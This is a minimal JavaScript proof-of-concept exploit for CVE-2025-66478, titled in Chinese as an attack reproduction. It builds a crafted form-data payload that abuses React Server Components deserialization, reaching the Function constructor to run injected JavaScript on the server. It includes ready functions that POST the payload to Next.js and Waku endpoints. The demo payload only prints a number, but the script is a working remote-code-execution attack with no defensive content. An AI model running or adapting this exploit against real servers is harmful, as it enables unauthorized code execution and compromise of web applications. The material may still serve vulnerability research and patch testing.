最小攻击复现 CVE-2025-66478

1const payload = {
2    '0': '$1',
3    '1': {
4        'status':'resolved_model',
5        'reason':0,
6        '_response':'$4',
7        'value':'{"then":"$3:map","0":{"then":"$B3"},"length":1}',
8        'then':'$2:then'
9    },
10    '2': '$@3',
11    '3': [],
12    '4': {
13        '_prefix':'console.log(7*7+1)//',
14        '_formData':{
15            'get':'$3:constructor:constructor'
16        },
17        '_chunks':'$2:_response:_chunks',
18    }
19}
20
21
22const FormDataLib = require('form-data')
23
24const fd = new FormDataLib()
25
26for (const key in payload) {
27    fd.append(key, JSON.stringify(payload[key]))
28}
29
30console.log(fd.getBuffer().toString())
31
32console.log(fd.getHeaders())
33
34function exploitNext(baseUrl) {
35    fetch(baseUrl, {
36        method: 'POST',
37        headers: {
38            'next-action': 'x',
39            ...fd.getHeaders()
40        },
41        body: fd.getBuffer()
42    }).then(x => {
43        console.log('fetched', x)
44        return x.text()
45    }).then(x => {
46        console.log('got', x)
47    })
48}
49
50function exploitWaku(baseUrl) {
51    fetch(baseUrl + '/RSC/foo.txt', {
52        method: 'POST',
53        headers: fd.getHeaders(),
54        body: fd.getBuffer()
55    }).then(x => {
56        console.log('fetched', x)
57        return x.text()
58    }).then(x => {
59        console.log('got', x)
60    })
61}
62
63// Place the correct URL and uncomment the line
64// exploitNext('http://localhost:3003')
65// exploitWaku('http://localhost:3002')